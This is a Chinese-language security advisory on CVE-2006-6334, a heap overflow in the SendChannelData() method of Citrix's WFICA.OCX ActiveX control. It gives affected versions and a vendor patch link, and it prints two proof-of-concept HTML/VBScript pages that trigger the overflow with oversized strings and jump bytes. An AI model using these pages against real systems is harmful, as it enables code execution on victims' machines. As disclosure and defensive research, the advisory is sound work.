安全研究

安全漏洞
Citrix Presentation Server客户端WFICA.OCX ActiveX组件堆溢出漏洞

发布日期:2006-12-06
更新日期:2006-12-07

受影响系统:
Citrix Presentation Server Client for Windows < 9.230
不受影响系统:
Citrix Presentation Server Client for Windows 9.230
描述:
BUGTRAQ  ID: 21458
CVE(CAN) ID: CVE-2006-6334

Citrix Presentation Server允许用户通过网络远程访问应用程序。

Citrix Presentation Server的WFICA.OCX控件在处理畸形参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。

Citrix Presentation Server客户端的ICA Client ActiveX控件组件WFICA.OCX(CLSID 238F6F83-B8B4-11CF-8771-00A024541EE3)中的SendChannelData()方法存在堆溢出漏洞。该函数的原型如下:

    SendChannelData(ChannelName As String,
        Data As String,
        DataSize As Long,
        DataType As ICAVCDataType)

如果能够为DataSize参数指定过小的缓冲区长度而对Data参数传送超长字符串的话,就会触发这个溢出,导致执行任意指令。

<*来源:Andrew Christensen (anc@fortconsult.net
  
  链接:http://secunia.com/advisories/23246/
        http://support.citrix.com/article/CTX111827&printable=true
        http://marc.theaimsgroup.com/?l=full-disclosure&m=116545528600892&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head> <title>Citrix ActiveX Caller</title> </head>
<body>
<OBJECT id="Security" width=500 height=500
classid="CLSID:238F6F83-B8B4-11CF-8771-
00A024541EE3">
<SPAN STYLE="color:red">Congrats. You aren't
vulnerable.</SPAN>
</OBJECT>
<script language=vbscript>
spamA = "whatever"
spamB =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9090EB04" + "70DE3400" +
"CCCCCCCC11111111"
msgbox "attach debugger"
Security.SendChannelData spamA,spamB,1,1
</script>
</body>
</html>


========================================================================
<html>     
<head> <title>Citrix ActiveX Caller</title> </head>     
<body>     
<OBJECT id="Security" width=500 height=500     
classid="CLSID:238F6F83-B8B4-11CF-8771-    
00A024541EE3">     
<SPAN STYLE="color:red">Congrats. You aren't     
vulnerable.</SPAN>     
</OBJECT>     
<script language=vbscript>     
spamA =     
"PAYLOADPAYLOADPAYLOADPAYLOADPAYLOADPAYLOADPAYLOAD"     
spamB = "AAAAAAAA" +     
"CCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "BBBBBBBB" +     
"DDDDDDDD11111111" + String(160,"C")     
msgbox "attach debugger"     
Security.SendChannelData spamA,spamB,1,1     
</script>     
</body>     
</html>

建议:
厂商补丁:

Citrix
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.citrix.com/English/SS/downloads/details.asp?dID=2755&downloadID=162299&pID=186

浏览次数:4449
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障